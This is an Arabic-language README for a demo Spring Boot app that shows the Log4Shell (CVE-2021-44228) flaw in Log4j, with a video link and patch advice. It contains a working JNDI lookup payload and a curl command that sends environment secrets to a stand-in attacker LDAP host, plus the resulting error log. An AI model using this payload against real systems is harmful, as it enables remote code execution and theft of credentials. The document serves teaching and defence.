
Log4Shell (CVE-2021-44228) هي ثغرة يوم الصفر في Log4j
تاريخ الاكتشاف: 24 نوفمبر 2021
تاريخ التصحيح: 6 ديسمبر 2021
اضغط أدناه لمشاهدة فيديو يوتيوب
هذا التطبيق النموذجي هو تطبيق Spring Boot، ويستخدم log4j كإطار عمل لتسجيل السجلات، ويعمل مع متغيرات البيئة التالية على المنفذ 8080 على localhost
شاهد شرح الفيديو:
متغيرات البيئة
key=jason.bourne;secret=Treadstone
POST http://localhost:8080//v1/public/log-test
المعامل:
value=${jndi:ldap://some-random-hacking-site.com}

باستخدام السلسلة التالية يمكنك الحصول على متغيرات البيئة
value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}
curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'
2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot
mvn dependency:tree
تأكد من أن أياً من ملفات الجرة التابعة لا يشير إلى إصدار log4j المعرض للخطر.
قائمة تشغيل Techflix للأمن على يوتيوب
https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1